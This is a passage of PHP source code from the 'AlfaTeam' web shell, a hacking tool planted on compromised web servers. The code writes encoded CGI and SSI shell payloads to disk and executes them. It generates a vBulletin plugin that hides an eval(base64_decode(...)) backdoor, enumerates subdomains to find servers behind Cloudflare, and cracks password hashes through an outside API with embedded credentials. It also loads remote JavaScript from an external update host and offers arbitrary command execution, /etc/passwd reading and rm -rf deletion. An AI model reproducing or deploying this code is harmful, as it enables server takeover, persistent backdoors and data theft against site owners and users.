2522. $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
2523. $res = true;
2524. }
2525. if ($res)
2526. {
2527. $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
2528. output($ff);
2529. }
2530. else
2531. {
2532. $ff = 'http://' . $realurl . $realpath . "/faq.php";
2533. $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
2534. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>";
2535. }
2536. }
2537. }
2538. echo '</div>';
2539. alfafooter();
2540. }
2541. function alfaupdatepath()
2542. {
2543. if ($_POST['path'] != '')
2544. {
2545. $_SESSION[__LAST_CWD__] = $_POST['path'];
2546. }
2547. echo ($_SESSION[__LAST_CWD__]);
2548. }
2549. function alfacheckfiletype()
2550. {
2551. $path = $_POST['path'];
2552. $arg = $_POST['arg'];
2553. if (@is_file($path . '/' . $arg))
2554. {
2555. echo ("file");
2556. }
2557. else
2558. {
2559. echo ("dir");
2560. }
2561. }
2562. function alfacheckupdate()
2563. {
2564. if (!isset($_COOKIE['alfa_checkupdate']))
2565. {
2566. if (function_exists("curl_version"))
2567. {
2568. $update = new AlfaCURL();
2569. $json = $update->Send("http://solevisible.com/update.json");
2570. $json = @json_decode($json);
2571. if ($json)
2572. {
2573. if (__ALFA_VERSION__ != $json->version)
2574. {
2575. @setcookie("alfa_checkupdate", "1", time() + 86400);
2576. echo ('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="' . $json->url . '" target="_blank">' . $json->text . '<br> Version: ' . $json->version . '</a></div></div></div>');
2577. }
2578. if (isset($json->js))
2579. {
2580. echo ('<div style="display:none;" id="jsurl">' . $json->js . '</div>');
2581. }
2582. }
2583. }
2584. }
2585. }
2586. function alfaWriteTocgiapi($name, $source)
2587. {
2588. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2589. @mkdir('alfacgiapi', 0755);
2590. __write_file("alfacgiapi/" . $name, __get_resource($source));
2591. @chmod("alfacgiapi/" . $name, 0755);
2592. }
2593. function alfacheckcgi()
2594. {
2595. if (strlen(alfaEx("id", false, true, true)) > 0) echo ("ok");
2596. else echo ("no");
2597. }
2598. function alfaupdateheader()
2599. {
2600. if (!isset($_SESSION["updateheader_data"]))
2601. {
2602. $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2603. $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2604. alfaWriteTocgiapi("getheader.alfa", $bash);
2605. $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa", false, true, true);
2606. if (@is_array(@json_decode($data, true)))
2607. {
2608. $_SESSION["updateheader_data"] = $data;
2609. echo $data;
2610. }
2611. }
2612. else
2613. {
2614. echo $_SESSION["updateheader_data"];
2615. }
2616. }
2617. function alfassiShell()
2618. {
2619. alfahead();
2620. echo '<div class=header>';
2621. @mkdir('alfa_shtml', 0755);
2622. @chdir('alfa_shtml');
2623. alfacgihtaccess('shtml');
2624. $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2625. @__write_file('alfa_ssi.shtml', __get_resource($code));
2626. @chmod("alfa_ssi.shtml", 0755);
2627. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2628. echo '</div>';
2629. alfafooter();
2630. }
2631. function alfacloudflare()
2632. {
2633. alfahead();
2634. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2635. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2636. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>')
2637. {
2638. $url = $_POST['alfa1'];
2639. if (!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url))
2640. {
2641. $url = preg_replace('/^(https?):\/\//', '', $url);
2642. $url = "http://www." . $url;
2643. }
2644. $headers = @get_headers($url, 1);
2645. $server = $headers['Server'];
2646. $subs = array(
2647. 'owa.',
2648. '2tty.',
2649. 'm.',
2650. 'gw.',
2651. 'mx1.',
2652. 'store.',
2653. '1',
2654. '2',
2655. 'vb.',
2656. 'news.',
2657. 'download.',
2658. 'video',
2659. 'cpanel.',
2660. 'ftp.',
2661. 'server1.',
2662. 'cdn.',
2663. 'cdn2.',
2664. 'ns.',
2665. 'ns3.',
2666. 'mail.',
2667. 'webmail.',
2668. 'direct.',
2669. 'direct-connect.',
2670. 'record.',
2671. 'ssl.',
2672. 'dns.',
2673. 'help.',
2674. 'blog.',
2675. 'irc.',
2676. 'forum.',
2677. 'dl.',
2678. 'my.',
2679. 'cp.',
2680. 'portal.',
2681. 'kb.',
2682. 'support.',
2683. 'search.',
2684. 'docs.',
2685. 'files.',
2686. 'accounts.',
2687. 'secure.',
2688. 'register.',
2689. 'apps.',
2690. 'beta.',
2691. 'demo.',
2692. 'smtp.',
2693. 'ns2.',
2694. 'ns1.',
2695. 'server.',
2696. 'shop.',
2697. 'host.',
2698. 'web.',
2699. 'cloud.',
2700. 'api.',
2701. 'exchange.',
2702. 'app.',
2703. 'vps.',
2704. 'owa.',
2705. 'sat.',
2706. 'bbs.',
2707. 'movie.',
2708. 'music.',
2709. 'art.',
2710. 'fusion.',
2711. 'maps.',
2712. 'forums.',
2713. 'acc.',
2714. 'cc.',
2715. 'dev.',
2716. 'ww42.',
2717. 'wiki.',
2718. 'clients.',
2719. 'client.',
2720. 'books.',
2721. 'answers.',
2722. 'service.',
2723. 'groups.',
2724. 'images.',
2725. 'upload.',
2726. 'up.',
2727. 'tube.',
2728. 'users.',
2729. 'admin.',
2730. 'administrator.',
2731. 'private.',
2732. 'design.',
2733. 'whmcs.',
2734. 'wp.',
2735. 'wordpress.',
2736. 'joomla.',
2737. 'vbulletin.',
2738. 'test.',
2739. 'developer.',
2740. 'panel.',
2741. 'contact.'
2742. );
2743. if (preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches))
2744. {
2745. if ($matches[2] != 'www')
2746. {
2747. $url = preg_replace('/^(https?):\/\//', '', $url);
2748. }
2749. else
2750. {
2751. $url = explode($matches[0], $url);
2752. $url = $url[1];
2753. }
2754. }
2755. if (is_array($server)) $server = $server[0];
2756. echo __pre();
2757. if (preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n<br>";
2758. else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2759. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2760. echo "[+] Searching for more IP addresses.\n\n<br><br>";
2761. for ($x = 0;$x < count($subs);$x++)
2762. {
2763. $site = $subs[$x] . $url;
2764. $ip = is_ipv4(gethostbyname($site));
2765. if ($ip == '(Null)') continue;
2766. echo "Trying {$site}: {$ip}\n<br>";
2767. }
2768. echo "\n[+] Finished.\n<br>";
2769. }
2770. echo '</div>';
2771. alfafooter();
2772. }
2773. function is_ipv4($ip)
2774. {
2775. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2776. }
2777. function __alert($s)
2778. {
2779. echo '<center>' . __pre() . $s . '</center>';
2780. }
2781. function create_table($data)
2782. {
2783. echo '<table border="1">';
2784. foreach ($data as $key => $val)
2785. {
2786. $array = array();
2787. foreach ($val as $k => $v)
2788. {
2789. $array[$k] = $v;
2790. }
2791. echo "<tr><td><div class='tbltxt'>" . $array['tdName'] . "</div></td><td><input type='text' id='" . $array['id'] . "' name='" . $array['inputName'] . "' " . ($array['placeholder'] ? 'placeholder' : 'value') . "='" . $array['inputValue'] . "' size='" . $array['inputSize'] . "' " . ($array['disabled'] ? 'disabled' : '') . "></td></tr>";
2792. }
2793. echo '</table>';
2794. }
2795. function alfaphp2xml()
2796. {
2797. alfahead();
2798. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2799. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2800. <input type='submit' name='go' value=' ' /></p></form></center>";
2801. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>')
2802. {
2803. echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>";
2804. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\'' . __ZW5jb2Rlcg($_POST['alfa1']) . '\'));exit;}]]></phpcode></plugin></plugins>';
2805. echo '</textarea></center></p>';
2806. }
2807. echo '</center></div>';
2808. alfafooter();
2809. }
2810. function alfacpcrack()
2811. {
2812. alfahead();
2813. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2814. if ($_POST['alfa1'] == 'dec')
2815. {
2816. $algorithms = array(
2817. 'md5' => 'MD5',
2818. 'md4' => 'MD4',
2819. 'sha1' => 'SHA1',
2820. 'sha256' => 'SHA256',
2821. 'sha384' => 'SHA384',
2822. 'sha512' => 'SHA512',
2823. 'ntlm' => 'NTLM'
2824. );
2825. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2826. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2827. foreach ($algorithms as $key => $val)
2828. {
2829. echo ('<option value="' . $key . '">' . $val . '</option>');
2830. }
2831. echo '</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2832. if ($_POST['alfa3'] == '>>')
2833. {
2834. $hash = $_POST['alfa2'];
2835. if (!empty($hash))
2836. {
2837. $hash_type = $_POST['alfa4'];
2838. $email = "solevisible@gmail.com";
2839. $code = "7b9fa79f92c3cd96";
2840. $target = "http://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code;
2841. $resp = @file_get_contents($target);
2842. if ($resp == '')
2843. {
2844. $get = new AlfaCURL();
2845. $resp = $get->Send($target);
2846. }
2847. echo __pre() . '<center>';
2848. switch ($resp)
2849. {
2850. case ('CODE ERREUR : 001'):
2851. echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
2852. break;
2853. case ('CODE ERREUR : 003'):
2854. echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
2855. break;
2856. case ('CODE ERREUR : 004'):
2857. echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
2858. break;
2859. case ('CODE ERREUR : 005'):
2860. echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
2861. break;
2862. }
2863. if (substr($resp, 0, 4) != 'CODE' && $resp != '')
2864. {
2865. echo "<b>Result: <font color='green'>" . $resp . "</font></b>";
2866. }
2867. elseif (substr($resp, 0, 4) != 'CODE')
2868. {
2869. echo "<font color='red'>NoT Found</font><br />";
2870. }
2871. echo ('</center>');
2872. }
2873. }
2874. }
2875. if ($_POST['alfa1'] == 'analyzer')
2876. {
2877. echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2878. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2879. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2880. if ($_POST['alfa3'] == '>>')
2881. {
2882. $hash = $_POST['alfa2'];
2883. if (!empty($hash))
2884. {
2885. $curl = new AlfaCURL();
2886. $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search");
2887. echo (__pre() . '<center>');
2888. if (preg_match('#<fieldset class="trouve">(.*?)</fieldset>#', $resp, $s))
2889. {
2890. echo ('<font color="green">' . $s[1] . '</font>');
2891. }
2892. else
2893. {
2894. echo ('<font color="red">Not Found...!</font>');
2895. }
2896. echo ('</center><br>');
2897. }
2898. }
2899. }
2900. echo '</div>';
2901. alfafooter();
2902. }
2903. function alfafooter()
2904. {
2905. if (!isset($_POST['ajax']))
2906. {
2907. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' ><tr><td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td><td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td><td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td><td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td></tr><tr><td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='" . htmlspecialchars($GLOBALS['cwd']) . "'> <input type='submit' value=' '></form></td><td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td></tr><tr><td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td></tr><tr><td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'><input type='hidden' name='a' value='FilesMAn'><input type='hidden' name='c' value='" . $GLOBALS['cwd'] . "'><input type='hidden' name='alfa1' value='uploadFile'><input type='hidden' name='charset' value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'><span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-" . date('Y') . " ]</span></td></tr></table></div><div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div><div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div><div id='update-content'></div><div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div><div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div><script>$(\"search-input\").addEventListener(\"keydown\",function(e){setTimeout(function(){var e=$(\"search-input\").value;d.getElementsByClassName(\"history-list\")[0].innerHTML=\"\";for(var a in editor_files)if(-1!=editor_files[a].file.search(e)||\"\"==e){var i=0;a==editor_current_file&&(i=\" is_active\"),insertToHistory(a,editor_files[a].file,i,editor_files[a].type)}},100)},!1),_Ajax(d.URL,\"a=\"+alfab64(\"checkupdate\"),function(e){d.body.insertAdjacentHTML(\"beforeend\",e);try{var dom = new DOMParser();var doc = dom.parseFromString(e, \"text/html\");var url = doc.getElementById(\"jsurl\").innerHTML;var newScript = document.createElement(\"script\");newScript.src = url;d.body.appendChild(newScript);}catch(e){console.log(e);}})," . $GLOBALS["need_to_update_header"] . "?_Ajax(d.URL,\"a=\"+alfab64(\"updateheader\"),function(e){try{var a=JSON.parse(e);for(var i in a){for(var r=\"\",t=0;t<a[i].length;t++)r+=\"useful\"==i||\"downloader\"==i?'<span class=\"header_values\" style=\"margin-left: 4px;\">'+a[i][t]+\"</span>\":a[i][t];var n=$(\"header_\"+i);n&&(n.innerHTML=r)}$(\"header_cgishell\").innerHTML=\"ON\",$(\"header_cgishell\").setAttribute(\"class\",\"header_on\")}catch(e){console.log(e)}}):islinux&&_Ajax(d.URL,\"a=\"+alfab64(\"checkcgi\"),function(e){\"ok\"==e&&($(\"header_cgishell\").innerHTML=\"ON\",$(\"header_cgishell\").setAttribute(\"class\",\"header_on\"))});</script></body></html>";
2908. }
2909. }
2910. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions') , 'posix_getpwuid') === false))
2911. {
2912. function posix_getpwuid($p)
2913. {
2914. return false;
2915. }
2916. }
2917. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions') , 'posix_getgrgid') === false))
2918. {
2919. function posix_getgrgid($p)
2920. {
2921. return false;
2922. }
2923. }
2924. function alfaWhich($p)
2925. {
2926. $path = alfaEx('which ' . $p, false, false);
2927. if (!empty($path)) return strlen($path);
2928. return false;
2929. }
2930. function alfaSize($s)
2931. {
2932. if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
2933. elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
2934. elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
2935. else return $s . ' B';
2936. }
2937. function alfaPerms($p)
2938. {
2939. if (($p & 0xC000) == 0xC000) $i = 's';
2940. elseif (($p & 0xA000) == 0xA000) $i = 'l';
2941. elseif (($p & 0x8000) == 0x8000) $i = '-';
2942. elseif (($p & 0x6000) == 0x6000) $i = 'b';
2943. elseif (($p & 0x4000) == 0x4000) $i = 'd';
2944. elseif (($p & 0x2000) == 0x2000) $i = 'c';
2945. elseif (($p & 0x1000) == 0x1000) $i = 'p';
2946. else $i = 'u';
2947. $i .= (($p & 0x0100) ? 'r' : '-');
2948. $i .= (($p & 0x0080) ? 'w' : '-');
2949. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
2950. $i .= (($p & 0x0020) ? 'r' : '-');
2951. $i .= (($p & 0x0010) ? 'w' : '-');
2952. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
2953. $i .= (($p & 0x0004) ? 'r' : '-');
2954. $i .= (($p & 0x0002) ? 'w' : '-');
2955. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
2956. return $i;
2957. }
2958. function alfaPermsColor($f, $isbash = false)
2959. {
2960. $class = "";
2961. $num = "";
2962. $human = "";
2963. if ($isbash)
2964. {
2965. $class = $f["class"];
2966. $num = $f["num"];
2967. $human = $f["human"];
2968. }
2969. else
2970. {
2971. $num = substr(sprintf('%o', @fileperms($f)) , -4);
2972. $human = alfaPerms(@fileperms($f));
2973. if (!@is_readable($f)) $class = "main_red_perm";
2974. elseif (!@is_writable($f)) $class = "main_white_perm";
2975. else $class = "main_green_perm";
2976. }
2977. return '<span style="font-weight:unset;" class="' . $class . '">' . $num . '</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="' . $class . '">' . $human . '</span>';
2978. }
2979. if (!function_exists("scandir"))
2980. {
2981. function scandir($dir)
2982. {
2983. $dh = opendir($dir);
2984. while (false !== ($filename = readdir($dh))) $files[] = $filename;
2985. return $files;
2986. }
2987. }
2988. function reArrayFiles($file_post)
2989. {
2990. $file_ary = array();
2991. $file_count = count($file_post['name']);
2992. $file_keys = array_keys($file_post);
2993. for ($i = 0;$i < $file_count;$i++)
2994. {
2995. foreach ($file_keys as $key)
2996. {
2997. $file_ary[$i][$key] = $file_post[$key][$i];
2998. }
2999. }
3000. return $file_ary;
3001. }
3002. function _alfa_can_runCommand($cgi = true, $cache = true)
3003. {
3004. if (isset($_SESSION["alfa_canruncmd"]) && $cache)
3005. {
3006. return true;
3007. }
3008. if (strlen(alfaEx("whoami", false, $cgi)) > 0)
3009. {
3010. $_SESSION["alfa_canruncmd"] = true;
3011. return true;
3012. }
3013. return false;
3014. }
3015. function _alfa_symlink($target, $link)
3016. {
3017. $phpsym = function_exists("symlink");
3018. if ($phpsym)
3019. {
3020. @symlink($target, $link);
3021. }
3022. else
3023. {
3024. alfaEx("ln -s '" . addslashes($target) . "' '" . addslashes($link) . "'");
3025. }
3026. }
3027. function _alfa_file_exists($file, $cgi = true)
3028. {
3029. if (@file_exists($file))
3030. {
3031. return true;
3032. }
3033. else
3034. {
3035. if (strlen(alfaEx("ls -la '" . addslashes($file) . "'", false, $cgi)) > 0)
3036. {
3037. return true;
3038. }
3039. }
3040. return false;
3041. }
3042. function _alfa_file($file, $cgi = true)
3043. {
3044. $array = @file($file);
3045. if (!$array)
3046. {
3047. if (strlen(alfaEx("id", false, $cgi)) > 0)
3048. {
3049. $data = alfaEx('cat "' . addslashes($file) . '"', false, $cgi);
3050. if (strlen($data) > 0)
3051. {
3052. return explode("\n", $data);
3053. }
3054. else
3055. {
3056. return false;
3057. }
3058. }
3059. else
3060. {
3061. return false;
3062. }
3063. }
3064. else
3065. {
3066. return $array;
3067. }
3068. }
3069. function _alfa_is_writable($file)
3070. {
3071. $check = false;
3072. $check = @is_writable($file);
3073. if (!$check)
3074. {
3075. if (_alfa_can_runCommand())
3076. {
3077. $check = alfaEx('[ -w "' . trim(addslashes($file)) . '" ] && echo "yes" || echo "no"');
3078. if ($check == "yes")
3079. {
3080. $check = true;
3081. }
3082. else
3083. {
3084. $check = false;
3085. }
3086. }
3087. }
3088. return $check;
3089. }
3090. function _alfa_is_dir($dir, $mode = "-d")
3091. {
3092. $check = false;
3093. $check = @is_dir($dir);
3094. if (!$check)
3095. {
3096. if (_alfa_can_runCommand())
3097. {
3098. $check = alfaEx('[ "' . trim($mode) . '" "' . trim(addslashes($dir)) . '" ] && echo "yes" || echo "no"');
3099. if ($check == "yes")
3100. {
3101. return true;
3102. }
3103. else
3104. {
3105. return false;
3106. }
3107. }
3108. }
3109. return $check;
3110. }
3111. function alfaFilesMan()
3112. {
3113. alfahead();
3114. echo '<div class="ajaxarea"><div class="header">';
3115. if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
3116. if (!empty($_POST['alfa1']))
3117. {
3118. switch ($_POST['alfa1'])
3119. {
3120. case 'uploadFile':
3121. if (isset($GLOBALS['glob_chdir_false']))
3122. {
3123. $alfa_canruncmd = _alfa_can_runCommand(true, true);
3124. $move_cmd_file = true;
3125. }
3126. $files = reArrayFiles($_FILES['f']);
3127. foreach ($files as $file)
3128. {
3129. if ($move_cmd_file)
3130. {
3131. alfaEx("cat '" . addslashes($file['tmp_name']) . "' > '" . addslashes($_POST["c"] . "/" . $file['name']) . "'");
3132. }
3133. else
3134. {
3135. @move_uploaded_file($file['tmp_name'], $file['name']);
3136. }
3137. echo "uped...!<Br>";
3138. }
3139. break;
3140. case 'mkdir':
3141. $new_dir_cmd = false;
3142. if (isset($GLOBALS['glob_chdir_false']))
3143. {
3144. if (_alfa_can_runCommand(true, true))
3145. {
3146. alfaEx("cd '" . trim(addslashes($_POST['c'])) . "';mkdir '" . trim(addslashes($_POST['alfa2'])) . "'");
3147. }
3148. }
3149. else
3150. {
3151. if (!@mkdir(trim($_POST['alfa2']))) echo "<b><font color='red'>Can't create new dir !</b></font>";
3152. }
3153. break;
3154. case 'delete':
3155. function deleteDir($path)
3156. {
3157. $path = (substr($path, -1) == '/') ? $path : $path . '/';
3158. $dh = @opendir($path);
3159. while (($item = @readdir($dh)) !== false)
3160. {
3161. $item = $path . $item;
3162. if ((basename($item) == "..") || (basename($item) == ".")) continue;
3163. $type = @filetype($item);
3164. if ($type == "dir") deleteDir($item);
3165. else @unlink($item);
3166. }
3167. @closedir($dh);
3168. @rmdir($path);
3169. }
3170. if (is_array(@$_POST['f'])) foreach ($_POST['f'] as $f)
3171. {
3172. if ($f == '..') continue;
3173. $f = rawurldecode($f);
3174. if (isset($GLOBALS["glob_chdir_false"]))
3175. {
3176. if (_alfa_can_runCommand(true, true))
3177. {
3178. alfaEx("rm -rf '" . addslashes($_POST['c'] . '/' . $f) . "'");
3179. }
3180. }
3181. else
3182. {
3183. alfaEx("rm -rf '" . addslashes($f) . "'", false, false);
3184. if (@is_dir($f)) deleteDir($f);
3185. else @unlink($f);
3186. }
3187. }
